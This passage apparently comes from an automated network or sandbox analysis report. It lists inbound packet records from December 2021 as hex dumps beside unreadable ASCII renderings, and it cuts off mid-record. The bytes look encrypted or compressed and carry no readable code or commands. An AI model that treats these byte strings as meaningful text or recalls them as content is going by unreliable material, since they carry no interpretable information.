e7 f8 17 df 1b b8 b2 cc b9 f5 09 8b 54 ea 8d 41 60 62 e1 af 25 87 87 68 4a 65 b4 2e 13 a5 4f 6c 86 c0 61 df 13 86 fb d8 ca f1 00 0f 26 81 ae e1 2a f5 9b b7 4f dc e9 7b Data Ascii: yjzwfUh>L?q3w83(6JcM^%mli_,sIB9O\|<'P ~H.~/\|NmfZ#(u)bv7MlGU\YRkwp`r!LTA`b%hJe.Ola&O{
2021-12-01 18:10:27 UTC	182	IN	Data Raw: 20 b3 18 94 18 b1 84 5c 3d 2a 09 07 3d 17 6d 98 04 42 be c7 f4 49 b0 d0 49 00 7c 8a db e4 2c c0 96 0c 1e 17 29 0c 94 47 a2 36 88 bd a8 76 a8 ee 75 d1 0f f1 20 cb 2c b0 a2 10 7a ef a8 ec 48 04 8d e6 e0 2a d8 94 85 c7 ab 7d 0f c3 f0 29 60 9c ee ad 4c c0 fd a3 40 f2 ac 92 b4 6d b9 af 65 c6 3f 15 6d cb 0a 98 3e b9 c6 c1 8a da 90 af d9 cb cd 62 2c ab 29 21 15 c4 d4 eb 4d 38 ea d1 d9 a4 b6 19 32 70 56 91 f1 7d e5 06 fa af 02 9e 3b 6e 92 89 41 09 4f d1 0d da f7 8a 4a ae da 1f e8 39 d4 41 5d cb 9c 74 43 25 32 ba 46 ac 90 72 cb 37 17 5b b3 c1 9b b1 26 6c 00 37 3d 6a f6 6b eb 4c f5 05 1d be c5 53 fe b0 77 bd 24 aa a7 cb 3e b1 ee 29 af 81 30 bd 63 0c 46 2d 12 0b 31 b6 56 ac ca 9b 71 97 c9 9e 3e 60 ba 1e 57 67 25 7c f0 b7 ee 98 ab ba 30 78 40 a2 33 e9 77 39 16 12 a0 Data Ascii: \==mBII\|,)G6vu ,zH})`L@me?m>b,)!M82pV};nAOJ9A]tC%2Fr7[&l7=jkLSw$>)0cF-1Vq>`Wg%\|0x@3w9
2021-12-01 18:10:27 UTC	183	IN	Data Raw: 61 d3 6b fd 33 d7 6f dc b4 9a 3c de e6 e6 6a 72 50 4f 05 9c b0 33 99 2f 39 b2 3f 5a 62 d5 57 3f 64 d9 31 8f 28 78 e3 68 1f c7 b4 a5 f0 d6 fd aa 13 34 46 eb 6e ec 96 f6 c8 1d 53 8f 56 ea 83 27 f9 41 8b d8 94 92 6a 41 ad 5d 97 f7 83 58 50 80 04 d5 89 f4 14 cd ca 15 25 e4 68 d0 32 d6 f0 ff 18 c7 62 38 d9 fe bc 39 0a f2 09 bd a9 e9 a5 c7 23 01 dc d5 7c 26 86 1d b8 3a 16 33 0f ba d0 d6 34 50 88 c1 c9 dc 0b 5c b3 9a 48 b5 26 c9 c3 52 81 cb 0f 8c 2a f1 2a 89 34 fb b9 d2 cc 0e d9 7c ab 51 d6 71 df d0 a2 aa e2 ab 28 7b 75 4b e0 3c 8f 7e aa ee 2f 45 fc 5e ba b6 ac 55 22 ea dc 11 de 2a ec 00 51 f0 a5 98 87 7f 1e 73 e2 7e d8 c1 cd 97 8b 49 c8 80 7f 0a bc d8 ad e7 48 23 eb c6 74 0e 43 84 19 a8 74 cd 0b 6e d1 bf e7 99 b3 c7 25 76 3a 56 5b 4e d5 8a 79 b7 02 3a e4 c4 9e Data Ascii: ak3o<jrPO3/9?ZbW?d1(xh4FnSV'AjA]XP%h2b89#\|&:34P\H&R*4\|Qq({uK<~/E^U"Qs~IH#tCtn%v:V[Ny:
2021-12-01 18:10:27 UTC	184	IN	Data Raw: 7a eb a2 d6 e6 6c e7 ae 44 8b c4 7d 9d 22 88 75 16 29 2d 44 cd 31 29 f6 76 1f 02 d0 73 c5 b5 8e 3e ea b7 80 52 48 c0 2b cd 5b fc b7 11 b7 bd 16 fb a6 d3 56 c7 f5 bf 33 c4 56 78 c3 a1 67 60 4a b9 ed 7a d6 71 12 4a 65 02 a4 f4 26 53 22 25 18 f3 8d 57 de 20 db 87 4c 05 e7 46 6f 0e 04 46 3f 21 3f 32 56 03 0c 02 87 db d9 72 2c 51 03 ea 87 6b cf fd d1 45 bf 64 8a 2b a8 37 29 08 4a ab e9 e7 64 c9 13 e2 a0 86 7a 54 3d 0a 87 78 6b d1 a4 28 b8 c6 87 51 ab d2 8e 25 81 53 86 c9 aa af ce 92 ff 35 40 f7 3e 74 89 12 5f d4 21 c4 9c 47 6f 5d 0a bd b1 5f da b5 6c 42 d4 ad 1c 99 cf f4 2c 84 bb c7 8c bb 32 55 09 3a 0c 83 db 32 b6 a0 be 96 13 e7 17 a1 a1 04 fd fc 00 08 3b 37 00 6f 8b 76 a9 d3 4a d8 df d9 48 38 da 64 65 df af 28 bb eb db 76 0a 76 30 2c 46 21 02 94 3b 48 f1 1a Data Ascii: zlD}"u)-D1)vs>RH+[V3Vxg`JzqJe&S"%W LFoF?!?2Vr,QkEd+7)JdzT=xk(Q%S5@>t_!Go]_lB,2U:2;7ovJH8de(vv0,F!;H
2021-12-01 18:10:27 UTC	186	IN	Data Raw: 97 45 a3 d4 52 5b 7f d3 94 de d8 d3 56 95 9d 8a a9 fd 0c 4d 31 5a b3 a5 c0 79 43 ce 29 66 d3 8d 67 0e da 14 26 e5 c2 c4 99 f1 a8 c1 11 f3 05 bb 47 14 09 55 4f bb dd 25 c1 5d d8 97 44 bc ff d5 bf 66 b9 0d 8d da 3b a8 df 6e 5d fe 77 61 a3 fa 1b e6 9a 89 3c 8d 98 33 80 e4 70 6a 4e c4 a9 ac e4 56 35 a1 2d 09 ec 3d cc 62 ce c8 d9 67 95 d7 a8 10 7a b1 36 1d 51 b4 3d 64 30 1c d2 f5 70 7e e9 1a b2 94 60 c8 01 ce 69 7f a6 65 42 c1 43 1d 86 96 04 6a 84 39 bb 8b 8c 65 d3 68 82 bc 8b 8b 62 14 bb 48 f3 d8 a8 8e 78 0a d4 29 a1 1a 51 62 d7 4d 18 f6 42 ec 3c 31 bf 53 b7 a7 51 23 a7 5e 33 39 69 60 f1 80 38 0a 6c 0d 2c d0 e0 a1 b6 f8 ba 2f ce 30 5e 8d c5 4a 23 26 ce 43 b4 60 82 e9 bf 11 f3 4a d6 36 6d b9 b8 59 e8 80 00 4d 01 ed 73 5d 8f a0 3c e2 ac a9 9d bb 30 06 4d b4 7c Data Ascii: ER[VM1ZyC)fg&GUO%]Df;n]wa<3pjNV5-=bgz6Q=d0p~`ieBCj9ehbHx)QbMB<1SQ#^39i`8l,/0^J#&C`J6mYMs]<0M\|
2021-12-01 18:10:27 UTC	187	IN	Data Raw: b1 e4 17 6b f3 1b 1b 5c e9 5a b3 34 79 f9 66 c9 a3 45 7f 56 40 55 5f 04 f6 d2 73 3c 81 a8 33 c1 75 19 bd 4d b9 e6 85 00 70 b4 32 0b 64 b9 a9 81 55 dd 79 fd 88 7f 26 b2 7a 10 66 48 7f c4 c7 a9 70 c3 e5 b0 ac 32 f4 0a ff 9b 3d 62 a1 bd 0d 07 a3 11 7f 77 ac 2a 83 3a ea 5c de 25 8b ea 56 ec 76 b6 1c 3a f6 67 88 71 80 76 20 ae f2 a1 92 ec 81 4b 49 1f 8e c2 1c e7 50 8c e1 b7 61 9b a5 9b 40 1c 61 76 5c b1 97 6c bd 68 f1 46 44 a5 ee 43 41 c3 fe 37 82 c9 d9 7d 87 11 20 64 19 47 3f 75 85 60 3c 27 15 83 3d 3e 6c c8 14 6e aa 08 f7 a7 83 2c 72 2b 7d 2a fc 46 2f 00 94 73 3f 56 2a 26 ac ed 90 76 8b f2 a8 69 ac 4f 74 75 0f 8d 09 da 2c d1 a3 9d 61 5e a8 6b 4b 7a ae 9e da 41 d9 02 9a d7 ab a3 19 0f d7 47 60 aa d6 2e 59 99 fe b4 41 ff b8 2a b5 91 b8 22 77 a0 3c 9c 6c 8d 2e Data Ascii: k\Z4yfEV@U_s<3uMp2dUy&zfHp2=bw:\%Vv:gqv KIPa@av\lhFDCA7} dG?u`<'=>ln,r+}F/s?V&viOtu,a^kKzAG`.YA"w<l.
2021-12-01 18:10:27 UTC	188	IN	Data Raw: 66 5c 24 08 be 03 20 7d 70 a6 f6 5d f7 03 3a 8b 3f e9 66 5f 9d f3 1f 7b 0a cd 8b 69 80 76 00 3b 30 a9 61 b2 d7 28 5b 8f a9 b8 f0 6d 97 7d e0 1a 38 64 fe 98 75 52 f4 fd 5c 5d 90 60 11 26 77 24 42 1e ce 46 be 50 0c 7f 49 93 89 49 6f 5c 15 e1 9e 36 5a 83 e0 ba 49 31 fd 06 53 cf fe 40 9b 2d 42 78 5b 1a 33 b3 cb 2f 29 82 1b 47 1f 41 05 f3 14 9c 7a 42 9a 6d 14 11 a3 34 5e a9 ba dd 0b 2c c7 4e 6e 77 d6 8a 21 29 5f 6a a9 da d1 4e f3 13 93 ad 38 90 d5 a0 a0 49 fd 96 62 6a 41 86 38 43 6d 91 fa 30 39 37 e4 fa 7f 8a 5b 18 07 60 a5 81 d8 9c 39 36 3f 06 6b 27 5c 53 73 75 38 fe 6d 56 eb ea 18 58 b0 ae c1 e9 f6 66 13 e5 03 0f 67 45 96 c8 e0 d8 5d 38 56 bd a6 fc b8 ea 8b 26 bf 2f 60 08 af 4a a7 b3 89 5d 15 fc 1e ea 83 cb 14 3a cb ba 26 08 69 ed 77 92 fa f6 1c c2 51 9c d1 Data Ascii: f\$ }p]:?f_{iv;0a([m}8duR\]`&w$BFPIIo\6ZI1S@-Bx[3/)GAzBm4^,Nnw!)_jN8IbjA8Cm097[`96?k'\Ssu8mVXfgE]8V&/`J]:&iwQ
2021-12-01 18:10:27 UTC	189	IN	Data Raw: 02 e3 2c 85 b4 f8 74 08 74 c9 7e e7 86 95 de 1f 28 fb 22 dd 86 f0 dc 11 fa 9c bb 4e d9 08 ce 9a 8f 9d ed 56 42 bc 61 77 88 b7 92 da 40 62 40 a7 2e a4 a3 63 55 a0 c2 2d d9 5e 8e bf ce e3 f7 c6 1b 85 92 79 e5 45 d0 c8 9e 7c da 97 61 e2 d8 0b ad 84 9a 52 83 c7 05 9c 99 fd c7 9e 6d f4 b7 8f e8 b8 87 64 e0 2d 8a e9 ea 3d 70 11 b6 f8 54 75 b3 9e 81 27 db 2d 09 ba c8 e6 59 c1 b2 97 8b 25 1a df 6d ef fe 36 f0 e2 e8 b0 07 a5 45 f7 26 12 8d 18 20 75 16 25 b3 89 92 34 7c 4c b8 3a e2 86 b3 49 51 22 c4 b4 89 71 a1 3a 14 81 00 99 84 22 28 8f 5a 4c 07 04 74 ab 96 16 2b d8 e0 a8 77 5b c0 5c cc 35 eb 43 09 db bc 3f b2 2c d5 47 c6 3a 95 d4 c4 f1 78 37 85 c3 35 41 bc fc 6e 53 71 f3 7b 51 22 68 ee ef 04 c5 0b c0 f0 6a 51 4e 08 8a 9f 98 05 17 32 af 14 3d 45 f6 28 fa 2f 01 01 Data Ascii: ,tt~("NVBaw@b@.cU-^yE\|aRmd-=pTu'-Y%m6E& u%4\|L:IQ"q:"(ZLt+w[\5C?,G:x75AnSq{Q"hjQN2=E(/
2021-12-01 18:10:27 UTC	191	IN	Data Raw: 89 d5 91 32 00 53 00 d8 07 b3 ff af ec 02 ea ae 1e 07 c2 bc fe 9f 55 e2 21 09 a7 d2 22 0a e9 a4 af 39 31 2f 45 22 44 94 11 54 0b 7b 58 4a c8 cc 72 94 e1 85 1d d4 bd fc 48 76 25 b5 f7 0e e2 e5 8a 75 33 6f 70 a3 0a 22 70 75 03 4a a4 0f 4a 5a bb 04 0e 27 6f ec 2b 32 30 36 17 bd 5a e2 2e df 7a 18 27 f8 8c cc 79 04 b8 6f 39 f1 2f 1a 25 a1 77 20 f6 98 80 a7 10 d0 a8 66 8a e6 b7 e1 2a 81 4b 7e 78 0d c8 65 9f 0b 2e 2c 1c 00 f7 62 ac d4 7a d9 79 1c 55 05 08 18 84 ec 99 61 a2 16 1a 97 7b 97 95 62 fd ed 53 3f 9e dd 8c 8b 51 66 30 4b bb 8d e8 56 61 c3 32 b8 d0 b3 3d 2c c9 d1 0e 37 c3 bf 94 95 ad f8 10 38 6a 63 40 58 08 0e 61 44 f7 ca c7 58 f7 95 31 ea fe ff 9a 30 b2 c0 89 10 31 57 d8 8a 04 83 67 bc 8b 30 1a fc 84 41 3f ac 99 42 c4 9d 76 36 4f 7e a1 85 e6 ec 36 f6 08 Data Ascii: 2SU!"91/E"DT{XJrHv%u3op"puJJZ'o+206Z.z'yo9/%w f*K~xe.,bzyUa{bS?Qf0KVa2=,78jc@XaDX101Wg0A?Bv6O~6
2021-12-01 18:10:27 UTC	192	IN	Data Raw: af c7 03 db fc a6 bc 7e 82 20 22 0e 9f 35 d1 22 ec ee 54 88 b0 76 85 7e 1b 80 a4 74 d8 41 c8 fe 82 ff cb e2 78 8c b6 08 eb 6d 4d 65 e9 58 74 30 51 58 04 dd 74 a7 48 54 fd b7 e7 9b b6 f2 0d b9 38 58 5b 97 92 a6 79 2c 15 35 c8 c2 87 b4 65 8a 94 81 b5 dc 8e b1 c1 37 39 b8 ac 99 c0 7f 91 32 4c 9f 71 bb f4 fc fd a7 cf 8f e2 c0 0b a7 54 a3 1b 32 a5 bc 07 ce 58 9c fb 6a 48 06 b4 3d 85 b8 42 34 60 b1 1c 2b 8d 28 f9 f3 ca b4 96 8c c9 9f 48 cf 57 76 5b e2 4d 99 e9 f8 b1 4d 32 ee f3 23 1b f1 ce 07 b0 2d 79 fa 47 28 a1 05 7f 35 59 c0 5d 54 f6 5b 40 af 83 fa 33 b2 69 4d bc 17 b9 55 8e a5 73 dd 32 f4 4f 1c ab 43 54 7f 74 18 88 bd 27 fa 77 eb 64 01 7f 3b ec 06 72 e1 e5 19 89 64 f4 03 ff 9a 18 d6 a3 7c 0c b3 ab fb 7d 96 ad 57 8b d9 eb bd df 92 93 51 54 6d 77 b7 33 6c f6 Data Ascii: ~ "5"Tv~tAxmMeXt0QXtHT8X[y,5e792LqT2XjH=B4`+(HWv[MM2#-yG(5Y]T[@3iMUs2OCTt'wd;rd\|}WQTmw3l
2021-12-01 18:10:27 UTC	193	IN	Data Raw: 9e e5 51 c4 bc 2a 4d 6b a3 d9 cb 36 f9 ee 8a 2d c7 e5 b0 16 59 74 3a a1 fc d1 2c b6 a0 a2 9e 5c f2 f1 a3 e0 30 36 b2 02 08 f5 22 9e 71 43 74 7a cf 3f c6 f7 8a ee 37 16 79 f3 df 63 1d 68 f7 a6 76 71 39 f0 22 46 21 e8 9a f3 54 17 18 78 cf 59 bf 26 fa 4d 23 df 82 f4 16 08 1a 1f 1a 1d be 16 cd c4 19 73 5b 47 df 9d 50 04 b3 ee 3d 9e 08 30 96 6e e3 4c 4e 12 ad 97 9c 41 8f ca 0d 14 59 01 65 3c 1d ee f2 70 46 25 7c ff 3d 2c cd 8a 5c 88 2e ae 63 09 eb ba 36 a2 ad a0 76 8d 09 6d a2 29 36 95 5a bd de 35 e7 01 3d 7f 22 09 6e 28 94 f0 12 ab 15 a6 8a 6a 8d 1e 10 cd 33 c2 6f 77 c1 44 7d 64 a7 16 f9 ae 9f af e3 9d 08 28 ff 54 75 52 fc c9 55 8b 92 2b 05 19 7e e4 42 aa c5 77 b7 62 0f 57 6c 1f 8a a5 6c 94 38 b6 97 02 59 7d d3 82 48 d7 fe 52 73 88 f7 a6 98 53 4f 4c 5a a2 33 Data Ascii: Q*Mk6-Yt:,\06"qCtz?7ychvq9"F!TxY&M#s[GP=0nLNAYe<pF%\|=,\.c6vm)6Z5="n(j3owD}d(TuRU+~BwbWll8Y}HRsSOLZ3
2021-12-01 18:10:27 UTC	194	IN	Data Raw: 76 e1 32 4a f6 77 89 7c 94 16 23 b5 f3 41 b8 83 82 53 48 40 bc a8 1f cc 51 82 cb da 62 a8 a4 4c 57 ae 63 be 5c 62 b1 13 be a3 f1 92 49 d2 ed 7b 40 d5 f3 15 83 02 d9 51 9f 6f 20 24 18 55 1a 3a 86 23 3d 6a 30 6a 3d 16 6d fe 05 29 a9 23 f6 c5 b1 70 71 03 7c 78 da 03 2c 53 95 12 1d 19 29 fe ac bc a3 45 88 29 a8 cd be 7d 77 ad 0f 1e 18 bc 2c b2 a2 7a 7b 23 ab 0b 4a 84 8c a4 d9 2a d8 6a 84 28 ab d3 18 da f3 2d 60 c9 d7 8c 4e bb fd 34 40 d3 aa 0f b6 12 b9 f3 5e b9 3f 14 6d 7b 08 c0 27 5d c4 9b 88 3f a9 ac d9 e3 cf 8b 2c 86 2d ee 15 38 d4 56 74 10 e8 50 d9 28 b6 f8 2a dd 50 f7 f1 2d de 4f fe 9e 02 36 38 82 92 5e 43 34 4c 66 33 e9 f7 c8 49 81 de 55 f3 9b d5 87 59 dd a6 02 40 19 31 15 46 59 97 3b c9 07 17 58 8d 6c 9b e8 26 a8 19 4e 1d f2 ed 62 f2 75 d6 6d 04 ee c5 Data Ascii: v2Jw\|#ASH@QbLWc\bI{@Qo $U:#=j0j=m)#pq\|x,S)E)}w,z{#Jj(-`N4@^?m{']?,-8VtP(P-O68^C4Lf3IUY@1FY;Xl&Nbum
2021-12-01 18:10:27 UTC	195	IN	Data Raw: 1c 79 1b 82 33 a1 8f 57 28 62 5e bd 7f 57 69 a8 75 44 1f a7 f3 ad 17 e3 ff 7e 36 34 dc 24 60 60 ac 21 0a c7 c3 86 56 bd 32 6d f6 9e bb db 9c dc fe e8 0d 39 9c 93 ea 73 88 17 50 a3 24 56 70 e9 3c 76 b1 ad 0d ec e6 31 0e 38 33 d9 6e d2 82 37 b7 48 4b dc 5a a0 51 fc 5e 94 0f c7 43 c5 1e 15 85 1c 31 06 dd 53 c1 02 ff a2 60 17 71 da 5c ec c4 05 a9 65 0d 20 3a e3 b0 72 bc 17 e4 8d dd 6a 1e b7 9d bb c7 ef e2 b5 5c ec 70 e6 bb 62 40 d4 97 9d 53 aa 5a 7a 3c b1 89 a9 79 3d 17 b2 8b 79 d7 36 6a 0c 4c fb c0 8a d1 38 4c c9 a9 41 07 3b b4 f3 a4 58 25 33 5b 43 85 a9 59 c2 bc 88 c9 9e 28 3f d7 d3 26 57 10 fa d5 e0 ec ff 61 c9 5a c7 2a c4 70 58 b9 ea aa 89 bf 54 e2 6d e4 42 e9 d0 f6 53 b7 e5 51 e9 46 00 e0 1d ac 1d ce a7 41 a7 cd fc b9 04 c1 61 4c 0a ab 25 de 62 a1 d7 12 Data Ascii: y3W(b^WiuD~64$``!V2m9sP$Vp<v183n7HKZQ^C1S`q\e :rj\pb@SZz<y=y6jL8LA;X%3[CY(?&WaZ*pXTmBSQFAaL%b
2021-12-01 18:10:27 UTC	196	IN	Data Raw: 92 3c c1 18 a6 f6 ce 13 ea c4 0a 33 e9 3a 50 dd e7 b9 f4 dd db 11 4e 32 bb 1c 59 ce d3 54 fa 27 1b ed 2d 27 ab 23 f6 27 b5 7f 54 b8 43 37 56 e5 dc dd 21 b3 57 fe f9 4c 93 c2 28 0d c2 ff e6 1e e2 ac 20 df c4 8e c9 de df c7 14 33 79 76 de 66 29 b5 23 89 46 c0 75 66 e2 f3 78 ec e6 c5 07 48 88 e8 cd 7e 9b 51 71 9f bd 01 ff a4 b7 03 c7 06 ea 5c a4 e5 7a d9 f4 f1 73 1e b9 ae 2c 40 35 a4 7e c6 56 d9 b2 c8 02 67 73 18 bb 4d 57 e1 44 49 da 78 53 3d 64 08 7a 5b 0f ff 21 97 62 b0 63 27 02 1f dc db 16 7a 51 f0 bc 1c 0c 7f ff cb 13 a2 74 df 2b eb 60 bf 4c 20 ac 4a b2 19 8f 7b b0 e5 d1 7a 1c fc 0a 2b 2e 8d b1 8e 28 bb c3 85 35 fc d2 7d 72 f2 32 37 cb b0 f8 4c 83 95 47 17 f7 e5 1b c0 75 ff bf 30 a1 7a 6d 3a 5d 48 e5 27 1c 9c bc ce 18 a9 e8 81 cb 8b ac 2c c3 75 c7 5f e1 Data Ascii: <3:PN2YT'-'#'TC7V!WL( 3yvf)#FufxH~Qq\zs,@5~VgsMWDIxS=dz[!bc'zQt+`L J{z+.(5}r27LGu0zm:]H',u_
2021-12-01 18:10:27 UTC	198	IN	Data Raw: 14 fa 57 1c ec 70 0a cb c9 f0 76 53 47 54 65 61 10 a4 85 01 f5 c6 77 92 cf eb e9 91 ed 67 5f bc 3e 11 35 fc bc 30 f8 cd 64 6a 7a 1b ed 04 c1 a9 1d fa 06 6b 30 6c 5b eb cc 08 fc 56 c4 da 60 3d 1a d3 d7 3a a1 8e 27 1c cc 83 db fd 30 22 7c 35 d7 56 c0 ac 09 45 5b 69 b6 79 49 65 b5 7a 6b 1c a6 f6 9c 54 c3 cc 79 3f 2a f4 28 70 6c c3 17 07 9a 8d ac 44 bd 5c 7e db 8b 8a ea 9e d0 ef e7 58 5c d5 b8 e6 74 a3 35 08 c4 29 75 55 c3 0e 50 a5 f6 55 bd 89 14 0f 4e 1b da 53 84 c8 43 89 43 50 d1 50 a8 07 ce 08 b8 13 c8 45 ec 1f 1f 86 68 78 34 c0 62 87 43 9a 84 76 02 62 9b 0f 98 f3 26 a7 6d 3c 0c 26 c3 f1 25 d9 43 f8 bd e0 5b 1f f7 ca e8 f0 fa e2 a3 74 f6 61 93 e6 0e 70 de ac a7 55 fc 0d 7a 11 b1 f0 b9 6a 3e 0f 9e b6 79 d9 21 0a 6d 29 d1 cd a4 c0 22 50 c6 af 56 7e 16 e7 9a Data Ascii: WpvSGTeawg_>50djzk0l[V`=:'0"\|5VE[iyIezkTy?*(plD\~X\t5)uUPUNSCCPPEhx4bCvb&m<&%C[tapUzj>y!m)"PV~
2021-12-01 18:10:27 UTC	199	IN	Data Raw: 0f ea 10 96 93 8a a9 c3 bf a9 e2 8d 6a e7 21 8f 4f 38 d5 02 07 fe 2c f5 92 28 2f 31 cd 5e e0 a5 11 38 03 b7 6e b6 f9 d1 a9 aa a5 85 f9 6c a6 e8 1c 9a 27 90 5b db 24 b2 8d 2f de 9a 4b db 96 aa 7c e7 ba 5e d0 fb 18 a5 26 1f f5 dd 0f 9b 59 f6 38 81 a9 e9 36 8b f7 38 41 f5 10 20 d9 b4 fe f3 fa 8f 0b 6d 57 df 1c 36 c8 eb 31 e8 20 62 fa 1b 27 9a 12 82 3b a2 10 7e 98 26 1c 76 b1 e3 f9 44 f4 45 97 dd 7d c0 cb 1d 7f c5 ab a5 12 db dc 25 f9 a1 eb cd aa cb c7 7b 07 59 04 e9 50 5d 83 04 ec 02 f2 10 57 e8 ba 50 cf 87 f0 3b 29 ae c9 8e 6a a2 25 66 b8 d8 62 cd c1 a7 09 84 16 cd 2e a7 de 0e fd d4 9d 45 3d cb 88 7a 03 10 82 0a f6 72 bc f4 df 72 50 49 71 90 7a 23 ef 4e 53 c7 50 76 58 17 23 6f 69 23 e6 43 9c 51 d3 75 32 6d 10 e6 be 11 58 38 fa 84 5e 0b 5a 9a ac 0d d6 42 f8 Data Ascii: j!O8,(/1^8nl'[$/K\|^&Y868A mW61 b';~&vDE}%{YP]WP;)j%fb.E=zrrPIqz#NSPvX#oi#CQu2mX8^ZB
2021-12-01 18:10:27 UTC	200	IN	Data Raw: c5 9c 61 73 38 40 d7 c3 28 04 d6 88 29 c9 71 30 f1 24 ea 06 37 12 ee 6c b4 12 cb ca 48 16 76 8b 1f 3c 5a dd d6 25 02 25 1d 97 21 8c a4 8a 3f 55 05 24 2c 09 8c 12 4d 49 ce d0 13 28 24 c7 d8 29 51 09 70 54 8e 46 93 75 57 64 68 61 1c 1f f8 56 75 c5 72 7e f0 cd f7 41 40 49 54 64 08 19 a6 f1 10 c3 de 58 98 de fa ee 8a f1 6c 44 91 36 75 05 a8 89 6d c9 fc 4a 6a 7a 17 83 25 a8 82 1d c3 2c 61 36 03 6f e3 c6 0b 95 6b da e4 7b 3c 12 fd d0 3a b9 89 3a 1d f8 d9 e0 f5 30 28 58 34 d4 33 86 9d 09 45 69 7a a0 6f 0c 38 89 60 54 1a ac f4 9c 43 c5 fe 70 29 3d 8f 73 47 7d b1 26 04 91 c3 86 53 bb 3d 69 db bb b4 cb 91 ea f8 fa 55 57 b2 df d6 6e 99 04 02 c2 1c 7e 75 cb 1b 5f a3 ec 4e b7 88 17 6a 0a 3d de 69 8d df 56 b8 7e 4d c0 56 a2 05 ce 19 bc 12 f4 43 c3 1b 1b 97 0d 4f 23 db Data Ascii: as8@()q0$7lHv<Z%%!?U$,MI($)QpTFuWdhaVur~A@ITdXlD6umJjz%,a6ok{<::0(X43Eizo8`TCp)=sG}&S=iUWn~u_Nj=iV~MVCO#
2021-12-01 18:10:27 UTC	202	IN	Data Raw: cd c2 0a ab 66 72 a9 a4 37 b1 ad a1 01 d8 8e b8 12 18 1a 92 58 86 89 48 50 8e 24 2b f5 27 20 74 b1 0d 7f 39 01 bd bf 94 6a c7 90 72 f5 5b 5e 29 3b e6 f1 29 c5 6d d8 8b 8f e8 7b 72 5b dd db ea 32 f7 11 8f 1b 5c c0 df b0 c0 7d fc 21 0f ef 71 bc 99 ef b8 d7 cf 8a 8f db 4c e6 54 a2 76 41 e3 0e 6b c8 0b f3 89 23 29 08 b4 49 e0 d1 1d 1f 01 b1 79 8c f9 da 9c b9 a7 f1 d1 6a bd d6 2d 90 27 9a 35 ea 28 8f 9d 09 d4 af 5f ab b7 cf 7d ee af 75 d4 de 0d a3 22 0c cc a4 18 9b 2d da 18 9b 92 c7 26 b9 f7 2b 56 c0 04 50 ff c6 c0 e6 fa b4 21 69 40 ba 2e 34 ab c7 31 e8 26 7e fb 0b 42 9a 03 a5 10 93 1a 71 81 43 3f 67 88 f5 fb 58 a7 77 8c d4 79 fe a3 1b 68 d4 f4 aa 2d d7 de 25 e6 c4 8c f8 aa e6 c4 44 35 5f 17 f1 33 4e 93 02 d6 52 f4 07 42 da f3 5c d4 e6 e1 3f 48 a4 d0 cd 78 ab Data Ascii: fr7XHP$+' t9jr[^);)m{r[2\}!qLTvAk#)Iyj-'5(_}u"-&+VP!i@.41&~BqC?gXwyh-%D5_3NRB\?Hx
2021-12-01 18:10:27 UTC	203	IN	Data Raw: a0 3e 1b 54 ea 92 ab 4b c6 d4 47 f1 26 8d 81 cb b5 67 bf d7 61 6d 4b 43 ff 00 2d 74 0e a3 50 ad 9a ef 24 4c 95 11 87 90 b0 6e 3c 87 c1 13 06 5d 51 49 36 55 fd fb a7 4a 56 6a ee b6 f6 d4 48 8e 4e 49 71 e0 b1 6e 88 4d bf 73 74 d1 ab c5 b7 69 05 3a 4a be c3 01 74 d6 9c 48 db 7e 5f f8 07 92 27 35 62 d9 62 db 38 ac 99 62 12 1d a8 0c 79 65 d9 b3 1d 11 4c 13 9e 21 af b1 ed 29 5f 60 2e 3f 4c 93 14 5c 66 f0 c9 19 21 24 c6 da 5d 69 2a 15 74 94 47 8e 60 4e 23 53 67 6e 09 fc 46 43 ef 70 0d e0 da ea 6e 64 41 5f 6e 61 10 a4 85 01 f5 dd 75 8d df ec e8 86 ec 6b 5f 96 21 01 39 93 a1 55 df eb 5a 71 7b 13 c3 10 dd ab 0c de 04 6a 7b 2f 64 e4 db 18 e7 59 ca f9 6a 3d 3a ab f1 2b ad 8a 3a 1c f1 f7 ec f6 27 26 43 35 dd 33 93 9b 14 41 45 7c 90 65 57 7c bb 66 4f 00 ad fd 9c 45 df Data Ascii: >TKG&gamKC-tP$Ln<]QI6UJVjHNIqnMsti:JtH~_'5bb8byeL!)_`.?L\f!$]i*tG`N#SgnFCpndA_nauk_!9UZq{j{/dYj=:+:'&C53AE\|eW\|fOE
2021-12-01 18:10:27 UTC	204	IN	Data Raw: 8e 5d 62 6c 4d 5e bf 97 44 d3 f8 bc 8a a3 23 3a da ee 21 4c 48 af b9 f7 ec db 7f dc 1e 96 65 eb 5e 08 da cc 88 9a be 60 df 66 e2 73 8b bf e5 59 8c c9 4d f4 14 66 81 3d a8 11 cf 9a 4a a1 fc 8f d7 33 c1 4c 47 0c ca 72 ac 4b 81 f3 25 d1 c0 7e c0 6c 6a a0 d6 7c 9a a8 b9 42 e4 99 bd 03 0f 03 d9 72 eb a7 21 4d 8a 22 0d fa 3b 10 76 b4 00 43 28 1e d1 d8 82 7b ec 8c 4e fd 48 5e 2f 37 e0 88 2a d2 70 da 81 9e c4 78 1f 58 cd db d0 05 99 17 88 03 66 d7 c2 af 92 5a e2 4e 20 f4 14 8a f4 9c 98 ce 90 88 8c a8 59 ee 27 85 77 37 c0 15 07 fe 3d f3 b8 2a 21 15 d6 41 e4 d7 26 0b 09 a7 6b ba ff a8 ad b7 86 9e e1 6a bb 84 2e 91 57 92 29 99 0e b4 9b 7b f5 a7 40 ab b5 c6 74 ed bc 01 f2 ff 1c b0 33 08 f1 d6 10 94 3c e6 29 b0 84 fa 2f 98 83 1a 5f c4 08 22 ec c6 d6 fc eb b8 06 58 40 Data Ascii: ]blM^D#:!LHe^`fsYMf=J3LGrK%~lj\|Br!M";vC({NH^/7pxXfZN Y'w7=!A&kj.W){@t3<)/_"X@
2021-12-01 18:10:27 UTC	205	IN	Data Raw: 5e c5 52 cd 69 03 c9 46 91 7c a4 5f b0 f1 ff 09 20 ce 67 64 2e e4 bd bd 47 af e7 ab 17 c4 a0 75 56 f2 10 0e b8 d7 ec 23 ae 89 54 29 99 db 74 f5 7f d7 a0 39 b6 4c 7c 02 33 79 bd 74 26 b7 c8 ef 2d 87 f9 bc b3 b9 da 7e e1 4a b2 7b d8 a6 12 0c 4a 98 b4 aa 41 df cf 46 e5 54 8b 94 d7 83 4d 94 cc 6e 7d 5f 52 df 01 04 18 20 b3 56 b4 b8 fa 2f 4a bb 10 9a b0 b8 4f 5d 9a c3 02 1c 6c 5c 4f 2a 54 f0 f1 80 24 50 74 e6 a1 fa dd 69 8a 65 4e 7c f8 9d 79 85 5b cf 54 64 cd b1 a0 93 29 30 34 4a bb c2 2d 70 da 81 47 dc 17 43 f3 36 b5 09 31 6a c4 66 c1 3b ed 